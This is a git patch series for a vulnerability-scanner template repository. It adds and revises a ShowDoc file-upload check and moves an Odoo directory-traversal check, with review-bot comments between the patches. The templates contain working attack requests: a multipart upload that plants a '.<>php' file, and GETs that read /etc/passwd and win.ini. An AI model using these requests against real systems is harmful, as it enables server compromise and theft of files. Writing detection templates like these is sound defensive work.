From 5de626ca848501e581aacc71b387734e8411077a Mon Sep 17 00:00:00 2001
From: Co5mos
Date: Sat, 25 Mar 2023 01:35:29 +0800
Subject: [PATCH 1/6] Added CNVD-2020-26585 Template

---
 cnvd/2020/CNVD-2020-26585.yaml | 69 ++++++++++++++++++++++++++++++++++
 1 file changed, 69 insertions(+)
 create mode 100644 cnvd/2020/CNVD-2020-26585.yaml

diff --git a/cnvd/2020/CNVD-2020-26585.yaml b/cnvd/2020/CNVD-2020-26585.yaml
new file mode 100644
index 0000000000..ac60288a68
--- /dev/null
+++ b/cnvd/2020/CNVD-2020-26585.yaml
@@ -0,0 +1,69 @@
+id: CNVD-2020-26585
+
+info:
+ name: Showdoc File Uploads
+ author: Co5mos
+ severity: critical
+ description: ShowDoc is an online API and technical documentation tool that is very suitable for IT teams. Showdoc has a file upload vulnerability, which attackers can exploit to gain server permissions.
+ reference:
+ - https://vul.wangan.com/a/CNVD-2020-26585
+ - https://blog.csdn.net/qq_48985780/article/details/122211136
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
+ cvss-score: 9.9
+ cwe-id: CWE-434
+ metadata:
+ verified: true
+ fofa-query: app="ShowDoc"
+ tags: showdoc,cnvd,cnvd2020,fileupload
+
+requests:
+ - raw:
+ - |
+ POST /index.php?s=/home/page/uploadImg HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Connection: close
+ Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617
+ Content-Length: 264
+
+ ----------------------------921378126371623762173617
+ Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
+ Content-Type: text/plain
+
+
+ ----------------------------921378126371623762173617--
+
+ - |
+ GET /Public//Uploads//{{date}}//{{file}} HTTP/1.1
+ Host: {{Hostname}}
+
+ extractors:
+ - type: regex
+ name: date
+ part: body
+ internal: true
+ group: 1
+ regex:
+ - '(\d{4}-\d{2}-\d{2})\\/([a-f0-9]+\.php)'
+
+ - type: regex
+ name: file
+ part: body
+ internal: true
+ group: 2
+ regex:
+ - '(\d{4}-\d{2}-\d{2})\\/([a-f0-9]+\.php)'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "8e20346f3b8304b53f3b120c2b857742"
+
+ - type: status
+ status:
+ - 200
From 7d23ba88b1776c00db052c8611d7e539dbb57620 Mon Sep 17 00:00:00 2001
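Review bot: The `words` matcher looks for `8e20346f3b8304b53f3b120c2b857742`, but that string is sent nowhere in the template and the multipart file part has no body (only blank lines between `Content-Type: text/plain` and the closing boundary), so the follow-up GET can at best return an empty file and the template cannot match unless the server itself happens to emit that value. If a PHP stub that prints the hash was meant to be uploaded it has been dropped; otherwise the matcher should key on something the upload actually produces. `Content-Length: 264` is also hard-coded — if it does not equal the real multipart body length the server may truncate or reject the upload, so drop it and let the engine fill it in. Finally, the request writes a `.php` file into the target's upload directory, which calls for an `intrusive` tag: `tags: showdoc,cnvd,cnvd2020,fileupload,intrusive`.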
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 25 Mar 2023 23:23:12 +0530 Subject: [PATCH 2/6] Delete CVE-2017-9416.yaml --- cves/2017/CVE-2017-9416.yaml | 41 ------------------------------------ 1 file changed, 41 deletions(-) delete mode 100644 cves/2017/CVE-2017-9416.yaml diff --git a/cves/2017/CVE-2017-9416.yaml b/cves/2017/CVE-2017-9416.yaml deleted file mode 100644 index ede23f11ac..0000000000 --- a/cves/2017/CVE-2017-9416.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2017-9416 - -info: - name: Odoo service authenticated - Directory Traversal - author: Co5mos - severity: medium - description: | - Directory traversal vulnerability in tools.file_open in Odoo 8.0, 9.0, and 10.0 allows remote authenticated users to read arbitrary local files readable by the Odoo service. - reference: - - https://www.cvedetails.com/cve/CVE-2017-9416/ - - https://github.com/odoo/odoo/issues/17394 - - https://nvd.nist.gov/vuln/detail/CVE-2017-9416 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.5 - cve-id: CVE-2017-9416 - cwe-id: CWE-22 - tags: cve2017,odoo,cve,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/base_import/static/c:/windows/win.ini" # windows - - "{{BaseURL}}/base_import/static/etc/passwd" # linux - - stop-at-first-match: true - matchers-condition: or - matchers: - - type: dsl - dsl: - - "regex('root:.*:0:0:', body)" - - "status_code == 200" - condition: and - - - type: dsl - dsl: - - "contains(body, 'bit app support')" - - "contains(body, 'fonts')" - - "contains(body, 'extensions')" - - "status_code == 200" - condition: and From d11ded468261765355a23b5be90328b742de736b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 25 Mar 2023 23:32:20 +0530 Subject: [PATCH 3/6] trailing-spaces fix --- cnvd/2020/CNVD-2020-26585.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
diff --git a/cnvd/2020/CNVD-2020-26585.yaml b/cnvd/2020/CNVD-2020-26585.yaml index ac60288a68..705a931a07 100644 --- a/cnvd/2020/CNVD-2020-26585.yaml +++ b/cnvd/2020/CNVD-2020-26585.yaml @@ -28,7 +28,7 @@ requests: Connection: close Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617 Content-Length: 264 - + ----------------------------921378126371623762173617 Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php" Content-Type: text/plain @@ -39,7 +39,7 @@ requests: - | GET /Public//Uploads//{{date}}//{{file}} HTTP/1.1 Host: {{Hostname}} - + extractors: - type: regex name: date From ca3037cce532bf9a17ed1e17fc5453eb2f7ed640 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 31 Mar 2023 15:49:43 +0530 Subject: [PATCH 4/6] updated matcher and info --- cnvd/2020/CNVD-2020-26585.yaml | 63 +++++++++++++++++----------------- 1 file changed, 31 insertions(+), 32 deletions(-) diff --git a/cnvd/2020/CNVD-2020-26585.yaml b/cnvd/2020/CNVD-2020-26585.yaml index 705a931a07..0f11659f3e 100644 --- a/cnvd/2020/CNVD-2020-26585.yaml +++ b/cnvd/2020/CNVD-2020-26585.yaml 
@@ -1,13 +1,15 @@ id: CNVD-2020-26585 info: - name: Showdoc File Uploads - author: Co5mos + name: Showdoc <2.8.6 - File Uploads + author: pikpikcu,Co5mos severity: critical - description: ShowDoc is an online API and technical documentation tool that is very suitable for IT teams. Showdoc has a file upload vulnerability, which attackers can exploit to gain server permissions. + description: | + ShowDoc is an online API and technical documentation tool that is very suitable for IT teams. Showdoc has a file upload vulnerability, which attackers can exploit to gain server permissions. reference: - https://vul.wangan.com/a/CNVD-2020-26585 - https://blog.csdn.net/qq_48985780/article/details/122211136 + - https://github.com/star7th/showdoc/pull/1059 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L cvss-score: 9.9 
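Review bot: The re-flowed `description` still says attackers can "gain server permissions" and the new `name`/reference point at the RCE fix in star7th/showdoc#1059, yet the classification shown as context below scores integrity and availability Low (`I:L/A:L`, `cvss-score: 9.9`) under `CWE-434` alone, which understates a code-execution outcome; the template this one replaces rated the same upload `CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H` with `cvss-score: 10.0`, and one of the two should be reconciled. The `<2.8.6` bound now appears only in `name`; the description would be clearer as `ShowDoc versions before 2.8.6 allow unauthenticated upload of arbitrary files via uploadImg, which attackers can exploit to gain server permissions.` so the affected range is stated where NVD-style tooling reads it. The `info:` block continues past the end of this hunk.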
@@ -15,55 +17,52 @@ info: metadata: verified: true fofa-query: app="ShowDoc" - tags: showdoc,cnvd,cnvd2020,fileupload + tags: cnvd,cnvd2020,showdoc,fileupload requests: - raw: - | POST /index.php?s=/home/page/uploadImg HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617 - Content-Length: 264 + Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633 - ----------------------------921378126371623762173617 - Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php" + ----------------------------835846770881083140190633 + Content-Disposition: form-data; name="editormd-image-file"; filename="{{randstr}}.<>txt" Content-Type: text/plain - - ----------------------------921378126371623762173617-- + test{{randstr}} + ----------------------------835846770881083140190633-- - | GET /Public//Uploads//{{date}}//{{file}} HTTP/1.1 Host: {{Hostname}} - extractors: - - type: regex - name: date - part: body - internal: true - group: 1 - regex: - - '(\d{4}-\d{2}-\d{2})\\/([a-f0-9]+\.php)' - - - type: regex - name: file - part: body - internal: true - group: 2 - regex: - - '(\d{4}-\d{2}-\d{2})\\/([a-f0-9]+\.php)' - matchers-condition: and matchers: - type: word part: body words: - - "8e20346f3b8304b53f3b120c2b857742" + - "test{{randstr}}" - type: status status: - 200 + + extractors: + - type: regex + name: date + part: body + group: 1 + regex: + - '(\d{4}-\d{2}-\d{2})\\/([a-f0-9]+\.txt)' + internal: true + + - type: regex + name: file + part: body + group: 2 + regex: + - '(\d{4}-\d{2}-\d{2})\\/([a-f0-9]+\.txt)' + internal: true + +# Enhanced by mp on 2022/05/30 From e9f9081e24b538d0512d1fefd796bc944024713b Mon Sep 17 00:00:00 2001 
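Review bot: The new `tags` line drops `intrusive`, yet the request still writes a file into the target's `Public/Uploads/<date>/` directory and leaves it there; the `showdoc-file-upload-rce.yaml` template this commit absorbs carried that tag, so keep it: `tags: cnvd,cnvd2020,showdoc,fileupload,intrusive`. Switching the payload to `{{randstr}}.<>txt` makes the check safe to run, but it now only proves that a `.txt` named with the `<>` trick is stored and served back — nothing in the hunk shows that a fixed ShowDoc rejects that filename, so confirm against a patched instance that this does not fire on every install before treating a hit as a vulnerability. The `# Enhanced by mp on 2022/05/30` footer is copied from the deleted template and predates this file; drop it or update it to the current edit.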
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 31 Mar 2023 15:50:15 +0530
Subject: [PATCH 5/6] Delete showdoc-file-upload-rce.yaml

---
 .../other/showdoc-file-upload-rce.yaml | 49 -------------------------------------
 1 file changed, 49 deletions(-)
 delete mode 100644 vulnerabilities/other/showdoc-file-upload-rce.yaml

diff --git a/vulnerabilities/other/showdoc-file-upload-rce.yaml b/vulnerabilities/other/showdoc-file-upload-rce.yaml
deleted file mode 100644
index 10f0f470eb..0000000000
--- a/vulnerabilities/other/showdoc-file-upload-rce.yaml
+++ /dev/null
@@ -1,49 +0,0 @@
-id: showdoc-file-upload-rce
-
-info:
- name: Showdoc <2.8.6 - Remote Code Execution
- author: pikpikcu
- severity: critical
- description: |
- Showdoc versions before 2.8.6 is susceptible to remote code execution.
- reference:
- - https://github.com/star7th/showdoc/pull/1059
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10.0
- cwe-id: CWE-77
- tags: rce,fileupload,showdoc,oss,intrusive
-
-requests:
- - raw:
- - |
- POST /index.php?s=/home/page/uploadImg HTTP/1.1
- Host: {{Hostname}}
- Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633
-
- ----------------------------835846770881083140190633
- Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
- Content-Type: text/plain
-
-
- ----------------------------835846770881083140190633--
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - '"url":"http:'
- - '"success":1'
- condition: and
-
- - type: status
- status:
- - 200
-
- extractors:
- - type: json
- json:
- - '.url'
-
-# Enhanced by mp on 2022/05/30
From f3ca8fd92a6e8806166f7306f78902d6e212112e Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 31 Mar 2023 16:46:48 +0530
Subject: [PATCH 6/6] Create CVE-2017-9416.yaml

---
 cves/2017/CVE-2017-9416.yaml | 41 ++++++++++++++++++++++++++++++++++++
 1 file changed, 41 insertions(+)
 create mode 100644 cves/2017/CVE-2017-9416.yaml

diff --git a/cves/2017/CVE-2017-9416.yaml b/cves/2017/CVE-2017-9416.yaml
new file mode 100644
index 0000000000..ede23f11ac
--- /dev/null
+++ b/cves/2017/CVE-2017-9416.yaml
@@ -0,0 +1,41 @@
+id: CVE-2017-9416
+
+info:
+ name: Odoo service authenticated - Directory Traversal
+ author: Co5mos
+ severity: medium
+ description: |
+ Directory traversal vulnerability in tools.file_open in Odoo 8.0, 9.0, and 10.0 allows remote authenticated users to read arbitrary local files readable by the Odoo service.
+ reference:
+ - https://www.cvedetails.com/cve/CVE-2017-9416/
+ - https://github.com/odoo/odoo/issues/17394
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-9416
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2017-9416
+ cwe-id: CWE-22
+ tags: cve2017,odoo,cve,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/base_import/static/c:/windows/win.ini" # windows
+ - "{{BaseURL}}/base_import/static/etc/passwd" # linux
+
+ stop-at-first-match: true
+ matchers-condition: or
+ matchers:
+ - type: dsl
+ dsl:
+ - "regex('root:.*:0:0:', body)"
+ - "status_code == 200"
+ condition: and
+
+ - type: dsl
+ dsl:
+ - "contains(body, 'bit app support')"
+ - "contains(body, 'fonts')"
+ - "contains(body, 'extensions')"
+ - "status_code == 200"
+ condition: and
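Review bot: The `description` and the `PR:L` in the CVSS vector say the read requires an authenticated Odoo user, but the request sends no session cookie or credentials, so on an instance that enforces that requirement the template will silently miss. Either the `/base_import/static/` route is reachable without a session — in which case `name` and the vector understate the exposure and should say so — or the template needs an authenticated-session variable in the request; the linked references should settle which, and a one-line comment above `path:` recording the answer would stop the next reader re-deriving it. Separately, this blob (`index 0000000000..ede23f11ac`) is byte-identical to the one removed in [PATCH 2/6] (`index ede23f11ac..0000000000`), so the two commits cancel out and would be cleaner squashed away from the series.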